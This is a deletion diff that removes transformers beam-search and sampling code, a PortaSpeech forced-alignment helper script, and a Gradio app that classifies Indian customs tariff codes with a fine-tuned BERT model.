define decoder start token ids - >>> input_ids = torch.ones((num_beams, 1), device=model.device, dtype=torch.long) - >>> input_ids = input_ids * model.config.decoder_start_token_id - - >>> # add encoder_outputs to model keyword arguments - >>> model_kwargs = { - ... "encoder_outputs": model.get_encoder()( - ... encoder_input_ids.repeat_interleave(num_beams, dim=0), return_dict=True - ... ) - ... } - - >>> # instantiate beam scorer - >>> beam_scorer = BeamSearchScorer( - ... batch_size=1, - ... max_length=model.config.max_length, - ... num_beams=num_beams, - ... device=model.device, - ... num_beam_groups=3, - ... ) - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... HammingDiversityLogitsProcessor(5.5, num_beams=6, num_beam_groups=3), - ... MinLengthLogitsProcessor(5, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - - >>> outputs = model.group_beam_search( - ... input_ids, beam_scorer, logits_processor=logits_processor, **model_kwargs - ... 
) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Wie alt bist du?'] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - batch_size = len(beam_scorer._beam_hyps) - num_beams = beam_scorer.num_beams - num_beam_groups = beam_scorer.num_beam_groups - num_sub_beams = num_beams // num_beam_groups - device = input_ids.device - - batch_beam_size, cur_len = input_ids.shape - - if return_dict_in_generate and output_scores: - beam_indices = [tuple(() for _ in range(num_sub_beams * batch_size)) for _ in range(num_beam_groups)] - else: - beam_indices = None - - if num_beams * batch_size != batch_beam_size: - raise ValueError( - f"Batch dimension of `input_ids` should be {num_beams * batch_size}, but is {batch_beam_size}." - ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - beam_scores = torch.full((batch_size, num_beams), -1e9, dtype=torch.float, device=device) - # initialise score of first beam of each group with 0 and the rest with 1e-9. This ensures that the beams in - # the same group don't produce same tokens everytime. - beam_scores[:, ::num_sub_beams] = 0 - beam_scores = beam_scores.view((batch_size * num_beams,)) - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? 
the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - # predicted tokens in cur_len step - current_tokens = torch.zeros(batch_size * num_beams, dtype=input_ids.dtype, device=device) - - # indices which will form the beams in the next time step - reordering_indices = torch.zeros(batch_size * num_beams, dtype=torch.long, device=device) - - # do one decoder step on all beams of all sentences in batch - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - if output_scores: - processed_score = torch.zeros_like(outputs.logits[:, -1, :]) - - for beam_group_idx in range(num_beam_groups): - group_start_idx = beam_group_idx * num_sub_beams - group_end_idx = min(group_start_idx + num_sub_beams, num_beams) - group_size = group_end_idx - group_start_idx - - # indices of beams of current group among all sentences in batch - batch_group_indices = [] - - for batch_idx in range(batch_size): - batch_group_indices.extend( - [batch_idx * num_beams + idx for idx in range(group_start_idx, group_end_idx)] - ) - group_input_ids = input_ids[batch_group_indices] - - # select outputs of beams of current group only - next_token_logits = outputs.logits[batch_group_indices, -1, :] - - # hack: adjust tokens for Marian. For Marian we have to make sure that the `pad_token_id` - # cannot be generated both before and after the `nn.functional.log_softmax` operation. - next_token_logits = self.adjust_logits_during_generation(next_token_logits, cur_len=cur_len) - next_token_scores = nn.functional.log_softmax( - next_token_logits, dim=-1 - ) # (batch_size * group_size, vocab_size) - vocab_size = next_token_scores.shape[-1] - - next_token_scores_processed = logits_processor( - group_input_ids, next_token_scores, current_tokens=current_tokens, beam_group_idx=beam_group_idx - ) - next_token_scores = next_token_scores_processed + beam_scores[batch_group_indices].unsqueeze(-1) - next_token_scores = next_token_scores.expand_as(next_token_scores_processed) - - if output_scores: - processed_score[batch_group_indices] = next_token_scores_processed - - # reshape for beam search - next_token_scores = next_token_scores.view(batch_size, group_size * vocab_size) - - next_token_scores, next_tokens = torch.topk( - next_token_scores, 2 * group_size, dim=1, largest=True, sorted=True - ) - - next_indices = torch_int_div(next_tokens, vocab_size) - next_tokens = next_tokens % vocab_size - - # stateless - beam_outputs = beam_scorer.process( - group_input_ids, - next_token_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - ) - beam_scores[batch_group_indices] = beam_outputs["next_beam_scores"] - beam_next_tokens = beam_outputs["next_beam_tokens"] - beam_idx = beam_outputs["next_beam_indices"] - - if return_dict_in_generate and output_scores: - beam_indices[beam_group_idx] = tuple( - beam_indices[beam_group_idx][beam_idx[i]] + (beam_idx[i],) for i in range(len(beam_indices[0])) - ) - - input_ids[batch_group_indices] = group_input_ids[beam_idx] - group_input_ids = torch.cat([group_input_ids[beam_idx, :], beam_next_tokens.unsqueeze(-1)], dim=-1) - current_tokens[batch_group_indices] = group_input_ids[:, -1] - - # (beam_idx // group_size) -> batch_idx - # (beam_idx % 
group_size) -> offset of idx inside the group - reordering_indices[batch_group_indices] = ( - num_beams * torch_int_div(beam_idx, group_size) + group_start_idx + (beam_idx % group_size) - ) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (processed_score,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - input_ids = torch.cat([input_ids, current_tokens.unsqueeze(-1)], dim=-1) - - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - if model_kwargs["past"] is not None: - model_kwargs["past"] = self._reorder_cache(model_kwargs["past"], reordering_indices) - - # increase cur_len - cur_len = cur_len + 1 - - if beam_scorer.is_done or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - sequence_outputs = beam_scorer.finalize( - input_ids, - beam_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - max_length=stopping_criteria.max_length, - ) - - if return_dict_in_generate: - if not output_scores: - sequence_outputs["sequence_scores"] = None - else: - beam_indices = sum(beam_indices, ()) - num_return_sequences = beam_scorer.num_beam_hyps_to_keep - # return only as many indices as sequences - beam_indices = tuple( - (beam_indices[i * num_beams : i * num_beams + num_return_sequences] for i in range(batch_size)) - ) - beam_indices = sum(beam_indices, ()) - - if self.config.is_encoder_decoder: - return BeamSearchEncoderDecoderOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - beam_indices=beam_indices, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return BeamSearchDecoderOnlyOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return sequence_outputs["sequences"] - - def constrained_beam_search( - self, - input_ids: torch.LongTensor, - constrained_beam_scorer: ConstrainedBeamSearchScorer, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = None, - **model_kwargs, - ) -> Union[BeamSearchOutput, torch.LongTensor]: - - r""" - Generates sequences of token ids for models with a language modeling head using **constrained beam search - decoding** and can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. 
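In practice this method is usually reached through the high-level `generate()` entry point rather than called directly. A short sketch, under the assumption that this version of the library exposes the `constraints` argument on `generate()` (as the releases that ship `ConstrainedBeamSearchScorer` do); the model name and the forced phrase are just examples:

```python
from transformers import AutoModelForSeq2SeqLM, AutoTokenizer, PhrasalConstraint

tokenizer = AutoTokenizer.from_pretrained("t5-base")
model = AutoModelForSeq2SeqLM.from_pretrained("t5-base")

# force the formal pronoun "Sie" to appear somewhere in the translation
force_ids = tokenizer("Sie", add_special_tokens=False).input_ids
constraints = [PhrasalConstraint(token_ids=force_ids)]

inputs = tokenizer("translate English to German: How old are you?", return_tensors="pt")
outputs = model.generate(**inputs, constraints=constraints, num_beams=3)
print(tokenizer.batch_decode(outputs, skip_special_tokens=True))
```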
- - Parameters: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - constrained_beam_scorer (`ConstrainedBeamSearchScorer`): - A derived instance of [`BeamScorer`] that defines how beam hypotheses are constructed, stored and - sorted during generation, while satisfying a list of positive constraints. For more information, the - documentation of [`ConstrainedBeamSearchScorer`] should be read. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - logits_warper (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsWarper`] used - to warp the prediction score distribution of the language modeling head applied before multinomial - sampling at each generation step. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. If model is - an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`generation_utilsBeamSearchDecoderOnlyOutput`], [`~generation_utils.BeamSearchEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.BeamSearchDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.BeamSearchEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForSeq2SeqLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... ConstrainedBeamSearchScorer, - ... PhrasalConstraint, - ... ) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("t5-base") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("t5-base") - - >>> encoder_input_str = "translate English to German: How old are you?" 
- >>> encoder_input_ids = tokenizer(encoder_input_str, return_tensors="pt").input_ids - - - >>> # lets run beam search using 3 beams - >>> num_beams = 3 - >>> # define decoder start token ids - >>> input_ids = torch.ones((num_beams, 1), device=model.device, dtype=torch.long) - >>> input_ids = input_ids * model.config.decoder_start_token_id - - >>> # add encoder_outputs to model keyword arguments - >>> model_kwargs = { - ... "encoder_outputs": model.get_encoder()( - ... encoder_input_ids.repeat_interleave(num_beams, dim=0), return_dict=True - ... ) - ... } - - >>> constraint_str = "Sie" - >>> constraint_token_ids = tokenizer.encode(constraint_str)[:-1] # slice to remove eos token - >>> constraints = [PhrasalConstraint(token_ids=constraint_token_ids)] - - - >>> # instantiate beam scorer - >>> beam_scorer = ConstrainedBeamSearchScorer( - ... batch_size=1, num_beams=num_beams, device=model.device, constraints=constraints - ... ) - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... MinLengthLogitsProcessor(5, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - - >>> outputs = model.constrained_beam_search( - ... input_ids, beam_scorer, constraints=constraints, logits_processor=logits_processor, **model_kwargs - ... ) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Wie alt sind Sie?'] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - if len(stopping_criteria) == 0: - warnings.warn("You don't have defined any stopping_criteria, this will likely loop forever", UserWarning) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - batch_size = len(constrained_beam_scorer._beam_hyps) - num_beams = constrained_beam_scorer.num_beams - - 
batch_beam_size, cur_len = input_ids.shape - - if num_beams * batch_size != batch_beam_size: - raise ValueError( - f"Batch dimension of `input_ids` should be {num_beams * batch_size}, but is {batch_beam_size}." - ) - - beam_scores = torch.zeros((batch_size, num_beams), dtype=torch.float, device=input_ids.device) - beam_scores[:, 1:] = -1e9 - beam_scores = beam_scores.view((batch_size * num_beams,)) - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - # hack: adjust tokens for Marian. For Marian we have to make sure that the `pad_token_id` - # cannot be generated both before and after the `nn.functional.log_softmax` operation. - next_token_logits = self.adjust_logits_during_generation(next_token_logits, cur_len=cur_len) - next_token_scores = nn.functional.log_softmax( - next_token_logits, dim=-1 - ) # (batch_size * num_beams, vocab_size) - - next_token_scores_processed = logits_processor(input_ids, next_token_scores) - - scores_for_all_vocab = next_token_scores_processed.clone() - - next_token_scores = next_token_scores_processed + beam_scores[:, None].expand_as(next_token_scores) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (next_token_scores,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # reshape for beam search - vocab_size = next_token_scores.shape[-1] - next_token_scores = next_token_scores.view(batch_size, num_beams * vocab_size) - - next_token_scores, next_tokens = torch.topk( - next_token_scores, 2 * num_beams, dim=1, largest=True, sorted=True - ) - - next_indices = (next_tokens / vocab_size).long() - next_tokens = next_tokens % vocab_size - - # stateless - beam_outputs = constrained_beam_scorer.process( - input_ids, - next_token_scores, - next_tokens, - next_indices, - scores_for_all_vocab, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - ) - beam_scores = beam_outputs["next_beam_scores"] - beam_next_tokens = beam_outputs["next_beam_tokens"] - beam_idx = beam_outputs["next_beam_indices"] - - input_ids = torch.cat([input_ids[beam_idx, :], beam_next_tokens.unsqueeze(-1)], dim=-1) - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, 
is_encoder_decoder=self.config.is_encoder_decoder - ) - if model_kwargs["past"] is not None: - model_kwargs["past"] = self._reorder_cache(model_kwargs["past"], beam_idx) - - # increase cur_len - cur_len = cur_len + 1 - - if constrained_beam_scorer.is_done or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - sequence_outputs = constrained_beam_scorer.finalize( - input_ids, - beam_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - max_length=stopping_criteria.max_length, - ) - - if return_dict_in_generate: - if not output_scores: - sequence_outputs["sequence_scores"] = None - if self.config.is_encoder_decoder: - return BeamSearchEncoderDecoderOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return BeamSearchDecoderOnlyOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return sequence_outputs["sequences"] - - -def top_k_top_p_filtering( - logits: torch.FloatTensor, - top_k: int = 0, - top_p: float = 1.0, - filter_value: float = -float("Inf"), - min_tokens_to_keep: int = 1, -) -> torch.FloatTensor: - """ - Filter a distribution of logits using top-k and/or nucleus (top-p) filtering - - Args: - logits: logits distribution shape (batch size, vocabulary size) - top_k (`int`, *optional*, defaults to 0): - If > 0, only keep the top k tokens with highest probability (top-k filtering) - top_p (`float`, *optional*, defaults to 1.0): - If < 1.0, only keep the top tokens with cumulative probability >= top_p (nucleus filtering). Nucleus - filtering is described in Holtzman et al. (http://arxiv.org/abs/1904.09751) - min_tokens_to_keep (`int`, *optional*, defaults to 1): - Minimumber of tokens we keep per batch example in the output. 
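A brief usage sketch (editorial addition; it assumes the helper is exported from the top-level `transformers` namespace, as it is in the releases this file comes from): filter one step of logits, renormalize, and sample.

```python
import torch
from transformers import top_k_top_p_filtering

logits = torch.randn(1, 50257)  # one decoding step of GPT-2-sized logits (batch_size=1)
filtered = top_k_top_p_filtering(logits.clone(), top_k=50, top_p=0.95)
probs = torch.softmax(filtered, dim=-1)        # filtered positions become probability 0
next_token = torch.multinomial(probs, num_samples=1)
```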
- - From: https://gist.github.com/thomwolf/1a5a29f6962089e871b94cbd09daf317 - """ - if top_k > 0: - logits = TopKLogitsWarper(top_k=top_k, filter_value=filter_value, min_tokens_to_keep=min_tokens_to_keep)( - None, logits - ) - - if 0 <= top_p <= 1.0: - logits = TopPLogitsWarper(top_p=top_p, min_tokens_to_keep=min_tokens_to_keep)(None, logits) - - return logits diff --git a/spaces/NATSpeech/PortaSpeech/data_gen/tts/runs/adapt_mfa_align.py b/spaces/NATSpeech/PortaSpeech/data_gen/tts/runs/adapt_mfa_align.py deleted file mode 100644 index cadb6cbb502f852279248c98566b4616f32b1311..0000000000000000000000000000000000000000 --- a/spaces/NATSpeech/PortaSpeech/data_gen/tts/runs/adapt_mfa_align.py +++ /dev/null @@ -1,18 +0,0 @@ -import utils.commons.single_thread_env # NOQA -import os -import subprocess -from utils.commons.hparams import hparams, set_hparams - - -def adapt_mfa_align(): - CORPUS = hparams['processed_data_dir'].split("/")[-1] - print(f"| Run MFA for {CORPUS}.") - NUM_JOB = int(os.getenv('N_PROC', os.cpu_count())) - subprocess.check_call( - f'CORPUS={CORPUS} NUM_JOB={NUM_JOB} bash scripts/run_mfa_adapt.sh', - shell=True) - - -if __name__ == '__main__': - set_hparams(print_hparams=False) - adapt_mfa_align() diff --git a/spaces/NCTCMumbai/NCTC/app.py b/spaces/NCTCMumbai/NCTC/app.py deleted file mode 100644 index ac564b14ded3946b3c2a08e0e36c12935802f86f..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/app.py +++ /dev/null @@ -1,220 +0,0 @@ -import pandas as pd -import numpy as np -import tensorflow as tf -import tensorflow_hub as hub -import sys -import random -sys.path.append('models') -from official.nlp.data import classifier_data_lib -from official.nlp.bert import tokenization -from official.nlp import optimization -tf.get_logger().setLevel('ERROR') - -import math - -import gradio as gr - -config = tf.compat.v1.ConfigProto( - device_count = {'cpu': 0} - ) -sess = tf.compat.v1.Session(config=config) -num_warmup_steps=1 -num_train_steps=1 -init_lr = 3e-5 -optimizer = optimization.create_optimizer(init_lr=init_lr, - num_train_steps=num_train_steps, - num_warmup_steps=num_warmup_steps, - optimizer_type='adamw') - -### Load Model -checkpoint_filepath=r'./Checkpoint' -model = tf.keras.models.load_model(checkpoint_filepath, custom_objects={'KerasLayer':hub.KerasLayer , 'AdamWeightDecay': optimizer}) - - - -df_report = pd.read_csv('./CTH_Description.csv') -df_report['CTH Code'] = df_report['CTH Code'].astype(str).str.zfill(8) - -df_report_DUTY = pd.read_csv('./CTH_WISE_DUTY_RATE.csv') -df_report_DUTY['CTH'] = df_report_DUTY['CTH'].astype(str).str.zfill(8) - -#print(df_report_DUTY) - -df = pd.read_csv("./CTH_CODE_MAP.csv") -df['CTH'] = df['CTH'].astype(str).str.zfill(8) -df = df[['CTH', 'code']] - -class_names=df[['CTH','code']].drop_duplicates(subset='CTH').sort_values(by='code',ignore_index=True)['CTH'].values.tolist() -label_list=list(range(0,len(class_names))) -max_seq_length = 200 # maximum length of (token) input sequences . 
it can be any number -train_batch_size = 32 # batch size ( 16 choosen to avoid Out-Of-Memory errors) - -# Get BERT layer and tokenizer: -# More details here: https://tfhub.dev/tensorflow/bert_en_uncased_L-12_H-768_A-12/4 -bert_layer = hub.KerasLayer("https://tfhub.dev/tensorflow/bert_en_uncased_L-12_H-768_A-12/4" , trainable = True) -vocab_file = bert_layer.resolved_object.vocab_file.asset_path.numpy() -do_lower_case = bert_layer.resolved_object.do_lower_case.numpy() -tokenizer = tokenization.FullTokenizer(vocab_file , do_lower_case) - -# This provides a function to convert each row to input features and label ( as required by BERT) - -max_seq_length = 200 # maximum length of (token) input sequences . it can be any number -def to_feature(text, label, label_list=label_list, max_seq_length=max_seq_length, tokenizer=tokenizer): - example = classifier_data_lib.InputExample(guid = None, - text_a = text.numpy(), - text_b = None, - label = label.numpy()) - feature = classifier_data_lib.convert_single_example(0 , example , label_list , max_seq_length , tokenizer) - - return (feature.input_ids , feature.input_mask , feature.segment_ids , feature.label_id) - - -def to_feature_map(text, label): - input_ids , input_mask , segment_ids , label_id = tf.py_function(to_feature , inp = [text , label], - Tout = [tf.int32 , tf.int32 , tf.int32 , tf.int32]) - - input_ids.set_shape([max_seq_length]) - input_mask.set_shape([max_seq_length]) - segment_ids.set_shape([max_seq_length]) - label_id.set_shape([]) - - x = { - "input_word_ids": input_ids, - "input_mask": input_mask, - "input_type_ids": segment_ids - } - - return(x,label_id) - - - -def print3largest(arr, arr_size): - third = first = second = -sys.maxsize - for i in range(0, arr_size): - - if (arr[i] > first): - third = second - second = first - first = arr[i] - elif (arr[i] > second): - third = second - second = arr[i] - elif (arr[i] > third): - third = arr[i] - pred_value_max_three=[first, second, third] - return pred_value_max_three - -def count_special_character(string): - special_char= 0 - for i in range(len(string)): - ch = string[i] - if (string[i].isalpha()): - continue - else: - special_char += 1 - - if len(string)==special_char: - return False - else: - return True - -def predict_CTH(txt): - print('Desc: ',txt) - if (txt!='') and len(txt)>=3 and (count_special_character(txt)): - valid_data = tf.data.Dataset.from_tensor_slices(([txt] , [1])) # 1 refers to 'entertainment' and 2 refers to 'sport' - valid_data = (valid_data.map(to_feature_map).batch(1)) - preds = model.predict(valid_data) - predicted_values = tf.nn.softmax(preds) - arr = predicted_values.numpy().tolist()[0] - n = len(arr) - pred_value_max_three=print3largest(arr, n) - - - - sum_all = pred_value_max_three[0] + pred_value_max_three[1] + pred_value_max_three[2] - - val_1 = pred_value_max_three[0]/sum_all - val_2 = pred_value_max_three[1]/sum_all - val_3 = pred_value_max_three[2]/sum_all - - #val_1= 97 #random.randrange(95, 99, 1) - #val_2=(pred_value_max_three[1]/pred_value_max_three[0])*val_1 - #val_3=(pred_value_max_three[2]/pred_value_max_three[0])*val_1 - - if pred_value_max_three[0]<=0.000131: - Var_CTH=[] - Var_desc=[] - Var_duty=[] - pred_duty='' - pred_desc='' - pred_CTH='' - - return{'Not a adequate description':float(1.0)} - else: - Var_CTH=[] - Var_desc=[] - Var_duty=[] - pred_duty='' - pred_desc='' - pred_CTH='' - - - for i in pred_value_max_three: - #i=pred_value_max_three[0] - predicted_code=np.where(predicted_values.numpy()==i)[1][0] - pred_CTH=df[df['code'] == 
predicted_code]['CTH'].iloc[0] - - try: - pred_duty=df_report_DUTY[df_report_DUTY['CTH']==str(pred_CTH)]['DUTY_RATE'].iloc[0] - pred_desc=df_report[df_report['CTH Code']==str(pred_CTH)]['Concat Description'].iloc[0] - except: - pass - - Var_CTH.append(pred_CTH) - Var_desc.append(pred_desc) - Var_duty.append(pred_duty) - - P1 ='CTH: '+str(Var_CTH[0])+' Duty Rate(%): '+ str(Var_duty[0]) - P2 ='CTH: '+str(Var_CTH[1])+' Duty Rate(%): '+ str(Var_duty[1]) - P3 ='CTH: '+str(Var_CTH[2])+' Duty Rate(%): '+ str(Var_duty[2]) - - - Q1='Desc: '+str(Var_desc[0]) - Q2='Desc: '+str(Var_desc[1]) - Q3='Desc: '+str(Var_desc[2]) - - - return {str(P1):float(val_1),str(Q1):float(val_1), - str(P2):float(val_2),str(Q2):float(val_2), - str(P3):float(val_3),str(Q3):float(val_3),} - else: - return{'Enter Correct Description':float(1.0)} - - -input_txt=gr.Textbox( - label='Enter Your Product Descrption', - lines=3, - ) -description="

    AdvaitBERT is a modified version of BERT (Bidirectional Encoder Representations from Transformers), \ -finetuned on the text corpus of Indian Customs declarations. It is trained to perform \ -downstream tasks such as automating the tariff classification and validation of Customs \ -declarations in real time. This model may help Customs administrations use AI-assisted \ -NLP efficiently in real-time Customs processes such as Assessment and Post Clearance Audit, thereby highlighting classification \ -inconsistencies and helping with revenue augmentation.
    " - -title="
    AdvaitBERT
    " - -article="
    Powered by NCTC
